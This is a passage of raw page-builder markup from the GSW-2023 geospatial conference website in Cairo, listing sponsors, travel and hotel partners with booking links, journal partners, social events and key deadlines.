/></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" 